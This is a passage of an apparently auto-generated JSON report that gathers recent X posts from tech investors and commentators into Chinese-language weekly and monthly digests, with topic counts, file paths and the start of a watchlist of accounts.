12-18 months, as some may lack durability vs…\n[原文链接](https://x.com/eladgil/status/2047364865527075139)\n\n**[2026-04-22T20:39:39+00:00]**\n> <3 @infisical\n[原文链接](https://x.com/eladgil/status/2047052737762980083)\n\n**[2026-04-21T22:45:48+00:00]**\n> What a time to be alive\n[原文链接](https://x.com/eladgil/status/2046722094348771758)\n\n**[2026-04-21T20:58:54+00:00]**\n> 👀\n[原文链接](https://x.com/eladgil/status/2046695194054320150)\n\n**[2026-04-21T19:36:05+00:00]**\n> The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱\n[原文链接](https://x.com/eladgil/status/2046674350993223784)\n\n**[2026-04-21T17:21:44+00:00]**\n> AI for email++\n[原文链接](https://x.com/eladgil/status/2046640542218604783)\n\n**[2026-04-20T23:50:03+00:00]**\n> 🔥\n[原文链接](https://x.com/eladgil/status/2046375878368940239)\n\n**[2026-04-20T18:51:07+00:00]**\n> R to @eladgil: Link to fuller post: https://substack.com/home/post/p-194229552?source=queue\n[原文链接](https://x.com/eladgil/status/2046300649483374704)\n\n**[2026-04-20T17:46:29+00:00]**\n> Here is the sbstack version \"Random thoughts while gazing at the misty AI Frontier\" https://blog.eladgil.com/p/random-thoughts-while-gazing-at-the\n[原文链接](https://x.com/eladgil/status/2046284381439103043)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 13/12 Anti-AI regulation & violence will both increase It is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively\n[原文链接](https://x.com/eladgil/status/2046284194943500453)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months\n[原文链接](https://x.com/eladgil/status/2046284191885922498)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product This is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size…\n[原文链接](https://x.com/eladgil/status/2046284190132609299)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 10/12 Harness creating more and more stickiness to models If you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be inc…\n[原文链接](https://x.com/eladgil/status/2046284188622737554)\n\n**[2026-04-20T17:45:42+00:00]**\n> R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies. Deep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in wor…\n[原文链接](https://x.com/eladgil/status/2046284184877187540)\n\n---\n\n### ✅ @DavidSacks — David Sacks(19 条)\n\n**[2026-04-26T20:42:24+00:00]**\n> MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.\n[原文链接](https://x.com/DavidSacks/status/2048502978626113625)\n\n**[2026-04-26T17:37:26+00:00]**\n> RT by @DavidSacks: Accurate\n[原文链接](https://x.com/DavidSacks/status/2048456433981591867)\n\n**[2026-04-26T15:03:35+00:00]**\n> RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by t…\n[原文链接](https://x.com/DavidSacks/status/2048417712439689346)\n\n**[2026-04-25T18:47:09+00:00]**\n> RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to ma…\n[原文链接](https://x.com/DavidSacks/status/2048111588930986354)\n\n**[2026-04-25T13:54:41+00:00]**\n> RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI From David Sacks \"Historically we only had two …\n[原文链接](https://x.com/DavidSacks/status/2048037985765949537)\n\n**[2026-04-25T03:16:09+00:00]**\n> RT by @DavidSacks: Incredible return on investment! 💰💰💰\n[原文链接](https://x.com/DavidSacks/status/2047877294476116184)\n\n**[2026-04-25T02:52:39+00:00]**\n> SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.\n[原文链接](https://x.com/DavidSacks/status/2047871382923469241)\n\n**[2026-04-25T02:37:36+00:00]**\n> Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.\n[原文链接](https://x.com/DavidSacks/status/2047867592790946189)\n\n**[2026-04-25T00:55:54+00:00]**\n> RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.” JASON: “What would happen if Kamala ‘Ding Dong’ was in right now?” SACKS: “We'd have n…\n[原文链接](https://x.com/DavidSacks/status/2047842000632713369)\n\n**[2026-04-24T23:41:01+00:00]**\n> RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening. @Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"…\n[原文链接](https://x.com/DavidSacks/status/2047823154655932696)\n\n**[2026-04-24T22:41:49+00:00]**\n> RT by @DavidSacks: POD UP! Core four is back 🚨 Big show: -- SpaceX-Cursor deal, using compute as leverage -- SaaS debt bomb coming to PE?, venture debt risk -- Software bloodbath, buy low potential? …\n[原文链接](https://x.com/DavidSacks/status/2047808256047821141)\n\n**[2026-04-24T16:41:47+00:00]**\n> R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.\n[原文链接](https://x.com/DavidSacks/status/2047717649849659586)\n\n**[2026-04-24T15:43:39+00:00]**\n> RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal: https://cnb.cx/4d3HAKp\n[原文链接](https://x.com/DavidSacks/status/2047703023690924289)\n\n**[2026-04-24T15:10:25+00:00]**\n> RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about…\n[原文链接](https://x.com/DavidSacks/status/2047694657107165519)\n\n**[2026-04-24T13:41:49+00:00]**\n> R to @DavidSacks: Full article: https://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share\n[原文链接](https://x.com/DavidSacks/status/2047672359377588241)\n\n**[2026-04-24T13:39:13+00:00]**\n> Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs wer…\n[原文链接](https://x.com/DavidSacks/status/2047671706660073767)\n\n**[2026-04-23T00:04:16+00:00]**\n> R to @DavidSacks: Full article: https://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices\n[原文链接](https://x.com/DavidSacks/status/2047104229773279572)\n\n**[2026-04-23T00:03:16+00:00]**\n> Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a …\n[原文链接](https://x.com/DavidSacks/status/2047103978979119580)\n\n**[2026-04-21T16:50:07+00:00]**\n> RT by @DavidSacks: This is insane… The Virginia redistricting amendment on the ballot today is framed as a vote to \"restore fairness in the upcoming elections.\" In reality, it turns a state that Kama…\n[原文链接](https://x.com/DavidSacks/status/2046632586735243420)\n\n---\n\n### ✅ @HarryStebbings — Harry Stebbings(19 条)\n\n**[2026-04-27T14:02:33+00:00]**\n> R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/i…\n[原文链接](https://x.com/HarryStebbings/status/2048764743205134644)\n\n**[2026-04-27T14:02:33+00:00]**\n> Adam Foroughi is by far one of the best CEOs I have ever interviewed. Candidly he is insanely stern and cold but also obsessive, focused and utterly brilliant. With Adam there is zero fluff, like non…\n[原文链接](https://x.com/HarryStebbings/status/2048764741435179442)\n\n**[2026-04-27T13:30:16+00:00]**\n> Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. Amazing business. Ins…\n[原文链接](https://x.com/HarryStebbings/status/2048756619622707452)\n\n**[2026-04-26T22:34:46+00:00]**\n> We hired someone for the investing team. Something I never planned to do. They sent the team 3 new deals per day for 90 days straight. All aligned to our stage, geography and deal type. That’s how yo…\n[原文链接](https://x.com/HarryStebbings/status/2048531257399664920)\n\n**[2026-04-26T19:35:39+00:00]**\n> I have interviewed 1,000 of the best CEOs of the last 10 years. Adam Foroughi, Founder @AppLovin is easily top 3, ever. $160BN Market Cap $5.48BN Revenue $10M EBITDA per head 82%+ margins Just 450 pe…\n[原文链接](https://x.com/HarryStebbings/status/2048486182904852537)\n\n**[2026-04-26T15:07:55+00:00]**\n> Seeing two types of founders emerge in this moment: The tourists and the terminators. The terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want …\n[原文链接](https://x.com/HarryStebbings/status/2048418806867870115)\n\n**[2026-04-26T13:56:31+00:00]**\n> The best founders I know all text their investors. None of them email them. The relationship will blossom and deepen in a matter of messages.\n[原文链接](https://x.com/HarryStebbings/status/2048400836024283246)\n\n**[2026-04-24T21:38:00+00:00]**\n> This week I got to sit down with two truly generational CEOs and ask them anything: @tobi @Shopify ($160BN Market Cap) Adam Foroughi @AppLovin ($160BN Market Cap) I have the best job in the world.\n[原文链接](https://x.com/HarryStebbings/status/2047792195868967172)\n\n**[2026-04-24T15:04:00+00:00]**\n> How Claude Design Will Hurt Figma \"Claude Design will not replace Figma directly, but it will chip away at it. It removes the need to wait for designers by letting people go straight from idea to pro…\n[原文链接](https://x.com/HarryStebbings/status/2047693043080261672)\n\n**[2026-04-23T23:43:00+00:00]**\n> Why the biggest fintech players are in for a shock. \"The shift is from human UX to agent UX. In the past, you won with dashboards, design and user experience. Now, the buyer is an AI agent, and it on…\n[原文链接](https://x.com/HarryStebbings/status/2047461264998478113)\n\n**[2026-04-23T21:23:00+00:00]**\n> I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important. \"I used to think MAUs and WAUs did not matter, now I think they are critical. In the AI era, usage is the l…\n[原文链接](https://x.com/HarryStebbings/status/2047426032840634830)\n\n**[2026-04-23T20:32:21+00:00]**\n> Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. There were next to no signs 20VC was or would be a success. He has been a dear friend ever since!\n[原文链接](https://x.com/HarryStebbings/status/2047413285675290984)\n\n**[2026-04-23T17:48:00+00:00]**\n> Does the $60BN Cursor Deal Make Sense: \"It actually makes sense when you look at what each side lacks. One has explosive revenue but weak margins due to compute and model costs. The other has massive…\n[原文链接](https://x.com/HarryStebbings/status/2047371926335857036)\n\n**[2026-04-23T16:53:42+00:00]**\n> It is a very expensive desire to be a value investor today. It is much easier to be a momentum investor, that is for sure.\n[原文链接](https://x.com/HarryStebbings/status/2047358263868436791)\n\n**[2026-04-23T14:06:50+00:00]**\n> R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF Youtube 👉 https://youtu.be/s61XVZAt5ns Apple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acqui…\n[原文链接](https://x.com/HarryStebbings/status/2047316269465006363)\n\n**[2026-04-23T14:06:50+00:00]**\n> This is the big f**king deal. Cursor acquired for $60BN by xAI I sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week: - Anthropic Hits $1TRN in S…\n[原文链接](https://x.com/HarryStebbings/status/2047316267858645088)\n\n**[2026-04-22T13:07:07+00:00]**\n> I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: 1. Nik Storonsky (Revolut) 2. @alanchanguk (Fuse Energy) 3. Adam Foroughi (AppLovin) 4. @awxjack (…\n[原文链接](https://x.com/HarryStebbings/status/2046938853445959738)\n\n**[2026-04-21T20:17:56+00:00]**\n> I have interviewed 1,000 CEOs of the largest companies over the last 10 years. Adam Foroughi is top 5 I have ever met. Easily. AppLovin Market Cap: $160BN Revenue: $5.48BN EBITDA per Head: $10M There…\n[原文链接](https://x.com/HarryStebbings/status/2046684883494600911)\n\n**[2026-04-21T15:37:00+00:00]**\n> In a world of agents, how do software providers prevent themselves from becoming valueless databases? \"The value proposition has to be: 1. How good are your APIs? 2. How well designed are they 3. Are…\n[原文链接](https://x.com/HarryStebbings/status/2046614183513604299)\n\n---\n\n### ✅ @jason — Jason Calacanis(19 条)\n\n**[2026-04-27T16:13:00+00:00]**\n> Imagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 From hill country ranches to Austin in ten minutes?! If you could buy one for $2m, or lease for $5k a …\n[原文链接](https://x.com/jason/status/2048797572014207114)\n\n**[2026-04-27T16:10:40+00:00]**\n> 10 minutes from manhattan to jfk is a game changer… … but the 5 minutes from my loft in Chelsea to Breezy Point in 7 minutes during the 90s would have been insane! Imagine when you can take these on …\n[原文链接](https://x.com/jason/status/2048796982227972344)\n\n**[2026-04-27T15:56:20+00:00]**\n> RT by @Jason: update! the @twistartups AI sidebar is going well The goal: a live AI sidebar with 4 personas watching the pod in real time Progress update: ✅ Side bar (Chrome extension works with any …\n[原文链接](https://x.com/jason/status/2048793378511536538)\n\n**[2026-04-27T15:03:32+00:00]**\n> Best accounts for following Austin air quality? @grok\n[原文链接](https://x.com/jason/status/2048780089295302690)\n\n**[2026-04-27T01:51:02+00:00]**\n> Incredible writing from @euphoriaHBO\n[原文链接](https://x.com/jason/status/2048580651985604783)\n\n**[2026-04-26T19:42:30+00:00]**\n> I’ve invested in 700 private companies Providing liquidity and loans to high performing founders is completely standard. In fact, investors encourage loans and secondary sales for founders to enable …\n[原文链接](https://x.com/jason/status/2048487905543237675)\n\n**[2026-04-26T18:14:04+00:00]**\n> Ok @Acosta, balls in your court\n[原文链接](https://x.com/jason/status/2048465651723882972)\n\n**[2026-04-26T18:05:09+00:00]**\n> The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare. Disgraziad\n[原文链接](https://x.com/jason/status/2048463405590225173)\n\n**[2026-04-26T17:13:01+00:00]**\n> Who made this?!\n[原文链接](https://x.com/jason/status/2048450286902235560)\n\n**[2026-04-26T16:21:34+00:00]**\n> I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th $100,000 cash prize Vegas 3, 3 minute rounds\n[原文链接](https://x.com/jason/status/2048437340218044499)\n\n**[2026-04-26T16:16:34+00:00]**\n> Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers\n[原文链接](https://x.com/jason/status/2048436081725464959)\n\n**[2026-04-26T13:51:54+00:00]**\n> RT by @Jason: Random pic of @Jason protecting our $TAO bags\n[原文链接](https://x.com/jason/status/2048399674269213067)\n\n**[2026-04-26T03:57:07+00:00]**\n> The left has a serious violence problem, which @DavidSacks called out early and often. This generation of woke democratic socialists are morally bankrupt. They believe in looting and violence as a po…\n[原文链接](https://x.com/jason/status/2048249992163242220)\n\n**[2026-04-26T03:46:17+00:00]**\n> If you’re not condemning these lunatics, you’re advocating for the end of the American empire. I’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individu…\n[原文链接](https://x.com/jason/status/2048247267182658004)\n\n**[2026-04-26T03:40:08+00:00]**\n> Heroes 🫡\n[原文链接](https://x.com/jason/status/2048245718171648271)\n\n**[2026-04-25T21:25:29+00:00]**\n> x.com/i/spaces/1nGeLyjZrkvKX\n[原文链接](https://x.com/jason/status/2048151434928017429)\n\n**[2026-04-25T19:06:45+00:00]**\n> nightmare blunt rotation\n[原文链接](https://x.com/jason/status/2048116521436590260)\n\n**[2026-04-25T19:06:07+00:00]**\n> today #knicks @mikal_bridges to 6th man/leads the bench in scoring Knicks play @23savage____ 26 minutes, he has 5 offensive boards We're up 20+ points in the second half @ATLHawks backs broken; they …\n[原文链接](https://x.com/jason/status/2048116362766127514)\n\n**[2026-04-25T17:57:08+00:00]**\n> RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for in…\n[原文链接](https://x.com/jason/status/2048099001782985057)\n\n---\n\n### ✅ @charliebilello — Charlie Bilello(14 条)\n\n**[2026-04-27T16:21:01+00:00]**\n> Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.\n[原文链接](https://x.com/charliebilello/status/2048799590044852390)\n\n**[2026-04-27T13:50:42+00:00]**\n> 2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quick…\n[原文链接](https://x.com/charliebilello/status/2048761760971096534)\n\n**[2026-04-27T13:16:36+00:00]**\n> The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s\n[原文链接](https://x.com/charliebilello/status/2048753179471323584)\n\n**[2026-04-27T13:08:19+00:00]**\n> With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjI…\n[原文链接](https://x.com/charliebilello/status/2048751094671585397)\n\n**[2026-04-27T12:53:00+00:00]**\n> RT by @charliebilello: Wondering which month is the best time to start investing? The right answer is any month. Just start!\n[原文链接](https://x.com/charliebilello/status/2048747238986305979)\n\n**[2026-04-26T16:18:48+00:00]**\n> RT by @charliebilello: Does a government shutdown negatively impact the stock market? No. The S&P 500 has gained an average of 0.4% during prior shutdowns and is up 4.8% during the current shutdown w…\n[原文链接](https://x.com/charliebilello/status/2048436641451155650)\n\n**[2026-04-26T15:10:21+00:00]**\n> RT by @charliebilello: The 12.5% gain in the S&P 500 over the last 4 weeks was the 20th biggest 4-week advance for the index since 1950. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s\n[原文链接](https://x.com/charliebilello/status/2048419415222259820)\n\n**[2026-04-26T14:19:13+00:00]**\n> RT by @charliebilello: The stock market is at an all-time high. Credit spreads are near all-time lows. And inflation has been above the Fed's target level for 61 consecutive months, averaging 4% per …\n[原文链接](https://x.com/charliebilello/status/2048406550897729561)\n\n**[2026-04-26T14:00:02+00:00]**\n> RT by @charliebilello: On March 30, the S&P 500 was down 7% in 2026, the 12th worst start to a year in history. After one of the biggest 4-week rallies ever, it's now up +5% YTD and above the average…\n[原文链接](https://x.com/charliebilello/status/2048401720540061794)\n\n**[2026-04-26T13:45:00+00:00]**\n> RT by @charliebilello: Global Inflation Rates are on the RISE... Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s\n[原文链接](https://x.com/charliebilello/status/2048397937156518387)\n\n**[2026-04-26T13:30:00+00:00]**\n> RT by @charliebilello: With the exception of Bitcoin, every major asset class is now in positive territory on the year... Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s\n[原文链接](https://x.com/charliebilello/status/2048394162366533935)\n\n**[2026-04-26T13:14:49+00:00]**\n> RT by @charliebilello: The S&P 500 ended the week at another all-time high, its 9th of the year. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s\n[原文链接](https://x.com/charliebilello/status/2048390341221404827)\n\n**[2026-04-25T19:55:14+00:00]**\n> RT by @charliebilello: New video is up: 📈The Week in Charts - breaking down the most important charts and themes in markets... https://www.youtube.com/watch?v=p5e0ThPjIAg\n[原文链接](https://x.com/charliebilello/status/2048128721286992166)\n\n**[2026-04-25T13:31:00+00:00]**\n> RT by @charliebilello: \"No one has ever been a success betting against America since 1776 — and they're not going to be a success in the future doing it, either.\" – Warren Buffett\n[原文链接](https://x.com/charliebilello/status/2048032027513864212)\n\n---\n\n### ✅ @WarriorTrading — Warrior Trading(0 条)\n\n---\n\n### ✅ @CryptoCred — Credible Crypto(1 条)\n\n**[2026-04-22T22:25:51+00:00]**\n> Dev is posting about price\n[原文链接](https://x.com/CryptoCred/status/2047079463750377958)\n\n---\n\n### ✅ @AltcoinBuzz — AltcoinBuzz(0 条)\n\n---\n\n### ⚠️ @二级炒家 — 二级炒家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @svwang1 — 王川(硅谷)(6 条)\n\n**[2026-04-25T01:59:39+00:00]**\n> 自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。\n[原文链接](https://x.com/svwang1/status/2047858045057909226)\n\n**[2026-04-24T15:45:26+00:00]**\n> 投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。 投资 AI 公司,也许可以让你暴富,但更大的几率是全部亏光。\n[原文链接](https://x.com/svwang1/status/2047703469063377001)\n\n**[2026-04-24T00:27:47+00:00]**\n> R to @Svwang1: 历史读得少的后果,是视野比较狭隘,看得不够远,对于因果链条比较长的事物无法正确理解,因此选择了错误的解释和预测体系。这进一步导致在关键转折点时作出错误选择,在本可低成本提早布局的时刻过于迟钝。\n[原文链接](https://x.com/svwang1/status/2047472537488302502)\n\n**[2026-04-24T00:19:18+00:00]**\n> 多看历史的一个好处是可以给自己开各种上帝视角,枯燥无聊或者低谷期时可以拥有乐观的想象力,顺风顺水时仍然保持谨慎而不得意忘形。\n[原文链接](https://x.com/svwang1/status/2047470402725921150)\n\n**[2026-04-20T21:42:30+00:00]**\n> 很多事情抽象几层之后,就发现底层逻辑是一样的, 而且非常简单。同样的底层逻辑,就可以举一反三,产生组合性和复利。从表象之下抽象出本质,有时会非常费力,因为太多信息迷雾,或者利益相关者搅浑水。所以复利只能在自己有信息优势,看得清楚的地方产生。搅浑水的人有动机用完全错误的信息诱导一批人接受他的错误的逻辑,然后你发现这些错误的逻辑在别的地方不适用,但又不理解是为什么。\n[原文链接](https://x.com/svwang1/status/2046343776378257515)\n\n**[2026-04-20T21:13:36+00:00]**\n> 很多慈善机构最后异化成圈钱的工具,用类似的话术来货币化他人的善心。甚至它所有的流程都在表面上都非常合规,但和慈善的精神和最终目的没有太大关系了。所有以 KPI 管理的机构最终都会变成这样。\n[原文链接](https://x.com/svwang1/status/2046336504407142606)\n\n---\n\n### ✅ @liuliu — 刘进(3 条)\n\n**[2026-04-24T04:05:41+00:00]**\n> I've been thinking about local LLMs a lot these days.\n[原文链接](https://x.com/liuliu/status/2047527371486658814)\n\n**[2026-04-23T17:57:10+00:00]**\n> I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.\n[原文链接](https://x.com/liuliu/status/2047374234004115719)\n\n**[2026-04-22T16:16:24+00:00]**\n> Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work! Ask Codex to implement a segmented file downloader: didn’t even get the completion blo…\n[原文链接](https://x.com/liuliu/status/2046986486629986435)\n\n---\n", + "monthly_analysis_md": "# X平台资讯深度分析报告\n\n**报告日期**: 2026-04-27T17:01:00.335819+00:00\n**分析账号**: 27个 | **活跃账号**: 21个 | **推文总量**: 259条\n\n---\n\n## 一、总体概览\n\n- 本报告基于 X 关注列表近30天 RSS 数据自动生成。\n- 默认口径:按账号聚合、按推文主题词粗分层。\n\n## 二、主题分布\n\n- **其他**:170 条\n- **模型能力**:53 条\n- **交易与市场**:15 条\n- **投融资与并购**:13 条\n- **算力与芯片**:8 条\n\n## 三、活跃账号 Top10\n\n- @GaryMarcus: 20 条\n- @sama: 20 条\n- @paulg: 20 条\n- @pmarca: 20 条\n- @eladgil: 20 条\n- @elonmusk: 19 条\n- @jason: 19 条\n- @HarryStebbings: 19 条\n- @DavidSacks: 19 条\n- @ylecun: 19 条\n\n## 四、代表性推文\n\n- @elonmusk | 2026-04-27T16:54:21+00:00\n - Calling him “Scam” Altman is accurate. This is very much worth reading.\n - https://x.com/elonmusk/status/2048807976991850953\n- @elonmusk | 2026-04-27T16:39:59+00:00\n - RT by @elonmusk: Sam Altman cannot be trusted. • The OpenAI board fired him because he was not always honest with them. They said he should not control powerful AI. • A major repo…\n - https://x.com/elonmusk/status/2048804363595059425\n- @elonmusk | 2026-04-27T16:31:33+00:00\n - Exactly\n - https://x.com/elonmusk/status/2048802239272169582\n- @elonmusk | 2026-04-27T16:30:27+00:00\n - Pinned: Scam Altman and Greg Stockman stole a charity. Full stop. Greg got tens of billions of stock for himself and Scam got dozens of OpenAI side deals with a piece of the actio…\n - https://x.com/elonmusk/status/2048801964457140540\n- @elonmusk | 2026-04-27T16:21:30+00:00\n - Scam Altman\n - https://x.com/elonmusk/status/2048799712375902624\n- @charliebilello | 2026-04-27T16:21:01+00:00\n - Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.\n - https://x.com/charliebilello/status/2048799590044852390\n- @jason | 2026-04-27T16:13:00+00:00\n - Imagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 From hill country ranches to Austin in ten minutes?! If you could buy one for $2m,…\n - https://x.com/jason/status/2048797572014207114\n- @jason | 2026-04-27T16:10:40+00:00\n - 10 minutes from manhattan to jfk is a game changer… … but the 5 minutes from my loft in Chelsea to Breezy Point in 7 minutes during the 90s would have been insane! Imagine when yo…\n - https://x.com/jason/status/2048796982227972344\n- @AndrewYNg | 2026-04-27T15:58:13+00:00\n - AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faste…\n - https://x.com/AndrewYNg/status/2048793852702757151\n- @elonmusk | 2026-04-27T15:56:52+00:00\n - RT by @elonmusk: From space to your phone, Starlink Mobile is now available to deliver data, voice, video, and messaging to @docomo customers in Japan 🛰️❤️📱\n - https://x.com/elonmusk/status/2048793511701717143\n- @jason | 2026-04-27T15:56:20+00:00\n - RT by @Jason: update! the @twistartups AI sidebar is going well The goal: a live AI sidebar with 4 personas watching the pod in real time Progress update: ✅ Side bar (Chrome exten…\n - https://x.com/jason/status/2048793378511536538\n- @GaryMarcus | 2026-04-27T15:50:31+00:00\n - If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, thos…\n - https://x.com/GaryMarcus/status/2048791912149295182\n- @GaryMarcus | 2026-04-27T15:33:34+00:00\n - R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.\n - https://x.com/GaryMarcus/status/2048787646206677207\n- @GaryMarcus | 2026-04-27T15:31:37+00:00\n - This is totally wrong. Blaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and o…\n - https://x.com/GaryMarcus/status/2048787157536653627\n- @elonmusk | 2026-04-27T15:26:33+00:00\n - RT by @elonmusk: .@shaunmmaguire says Elon Musk’s X acquisition was in service of civilizational-scale missions. \"I truly believe, like in my soul, that he is trying to help human…\n - https://x.com/elonmusk/status/2048785882950549854\n- @elonmusk | 2026-04-27T15:15:09+00:00\n - If extremely violent criminals are not imprisoned, eventually they will murder innocent people\n - https://x.com/elonmusk/status/2048783014075777369\n- @jason | 2026-04-27T15:03:32+00:00\n - Best accounts for following Austin air quality? @grok\n - https://x.com/jason/status/2048780089295302690\n- @elonmusk | 2026-04-27T14:53:45+00:00\n - Excellent point\n - https://x.com/elonmusk/status/2048777628019032335\n- @GaryMarcus | 2026-04-27T14:27:36+00:00\n - yep, that’s what I do. I am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me. i don’t think that is going to…\n - https://x.com/GaryMarcus/status/2048771044987777428\n- @HarryStebbings | 2026-04-27T14:02:33+00:00\n - R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-4…\n - https://x.com/HarryStebbings/status/2048764743205134644\n\n---\n\n*本报告由系统自动生成,供月度复盘使用。*\n", + "paths": { + "tweet_summary_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/推文汇总_202604.md", + "monthly_analysis_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/月度深度分析_202604.md" + } +} \ No newline at end of file diff --git a/data/x_brief/history/20260427_170834.json b/data/x_brief/history/20260427_170834.json new file mode 100644 index 0000000..e84dabc --- /dev/null +++ b/data/x_brief/history/20260427_170834.json @@ -0,0 +1,2991 @@ +{ + "generated_at": "2026-04-27T17:07:38.921884+00:00", + "report_type": "weekly", + "input": { + "watchlist_path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/简报配置.md", + "watchers": [ + { + "handle": "karpathy", + "name": "Andrej Karpathy" + }, + { + "handle": "sama", + "name": "Sam Altman" + }, + { + "handle": "DarioAmodei", + "name": "Dario Amodei" + }, + { + "handle": "AravSrinivas", + "name": "Aravind Srinivas" + }, + { + "handle": "AndrewYNg", + "name": "Andrew Ng" + }, + { + "handle": "ylecun", + "name": "Yann LeCun" + }, + { + "handle": "JeffDean", + "name": "Jeff Dean" + }, + { + "handle": "soumithchintala", + "name": "Soumith Chintala" + }, + { + "handle": "gregbrockman", + "name": "Greg Brockman" + }, + { + "handle": "GaryMarcus", + "name": "Gary Marcus" + }, + { + "handle": "elonmusk", + "name": "Elon Musk" + }, + { + "handle": "paulg", + "name": "Paul Graham" + }, + { + "handle": "naval", + "name": "Naval Ravikant" + }, + { + "handle": "pmarca", + "name": "Marc Andreessen" + }, + { + "handle": "david_tiantian", + "name": "David Tian Wang" + }, + { + "handle": "morganhousel", + "name": "Morgan Housel" + }, + { + "handle": "eladgil", + "name": "Elad Gil" + }, + { + "handle": "DavidSacks", + 